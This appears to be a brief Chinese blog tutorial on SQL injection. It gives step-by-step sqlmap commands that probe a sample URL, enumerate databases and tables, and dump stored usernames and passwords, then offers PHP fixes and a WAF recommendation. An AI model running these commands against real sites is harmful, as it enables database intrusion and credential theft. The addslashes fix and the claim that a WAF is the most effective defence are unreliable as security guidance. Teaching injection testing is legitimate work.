durpsuite
proxy:代理 intruder:攻击器 repeater:中继器 decoder:解码器 comparer:比较器
一、sqlmap使用教程
sqlmap是一款强大的SQL注入工具,以下是几个常用功能的使用方法:
-
探测注入点
sqlmap.py -u http://192.168.10.111/news/show.php?id=46
-
获取所有数据库名称
sqlmap.py -u http://192.168.10.111/news/show.php?id=46 -dbs
-
获取当前数据库
sqlmap.py -u http://192.168.10.111/news/show.php?id=46 --current-db
-
获取指定数据库表名
sqlmap.py -u http://192.168.10.111/news/show.php?id=46 -D news --tables
-
获取表中所有字段
sqlmap.py -u http://192.168.10.111/news/show.php?id=46 -D news -T news_users --columns
-
获取数据
sqlmap.py -u http://192.168.10.111/news/show.php?id=46 -D news -T news_users -C username,password --dump
二、SQL漏洞修复
-
数值型注入修复
$id = intval($_GET['id']);
-
字符型注入修复
$username = addslashes($_POST ["username"]);
三、防御措施
对于所有Web注入类的漏洞,安装Web应用防火墙(WAF)是最有效的解决方案。它可以有效拦截SQL注入攻击,保护你的网站安全。
以上就是今天的分享,希望对大家有所帮助。如有疑问,欢迎在评论区交流讨论